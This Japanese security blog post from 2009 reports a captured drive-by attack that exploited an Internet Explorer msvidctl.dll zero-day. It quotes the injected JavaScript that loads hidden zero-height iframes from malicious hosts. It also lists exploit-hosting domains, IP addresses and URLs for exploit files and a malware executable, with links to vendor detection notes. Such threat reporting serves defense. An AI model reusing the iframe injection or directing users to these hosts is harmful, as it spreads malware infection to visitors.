IE(msvidctl.dll) への 0-day attack
Published: 2009/07/07
クライアントハニーポットでキャッチしました。情報源は中国のブログです。
iframe
document.write('<iframe src=http://wf3gr.8800.org/aa/a3.htm?wwcc width=100 height=0></iframe> '); document.write("<iframe src=http://www.dztv.cn/rh/343/link.html width=100 height=0></Iframe>");
exploitをホストしているドメイン
wf3gr.8800.org www.dztv.cn
ttp://219.232.228.234/rh/343/darkst.png ttp://219.232.228.234/rh/343/link.html ttp://219.232.228.234/rh/343/logo.gif
ttp://59.34.197.154/aa/a3.htm?wwcc ttp://59.34.197.154/aa/go.jpg ttp://59.34.197.154/aa/go1.jpg ttp://59.34.197.154/aa/go1.jpg ttp://59.34.197.154/aa/index.htm ttp://59.34.197.154/aa/index.htm ttp://59.34.197.154/aa/logo.gif
ttp://60.172.190.217/wm/svchost.exe
darkst.png, go.jpg が exploit
トレンドブログに書かれているシェルコードを確認
Zero-day MPEG2TuneRequest Exploit Leads to KILLAV
セッションダンプをシマンテックが検知(Downloader.Fostrem)
http://securityresponse.symantec.com/ja/jp/security_response/writeup.jsp?docid=2009-070605-3347-99
>注意: 2009 年 7 月 5 日以前のウイルス定義では、この脅威を Downloader と Trojan Horse として検出します。
以前から検知可能だった模様
テクニカルノートにダウンロードされる検体のURLが書かれてるの前からだっけ、、
ホスト上で確保した検体2個
svchost[1].exe
a.exe
by TTTT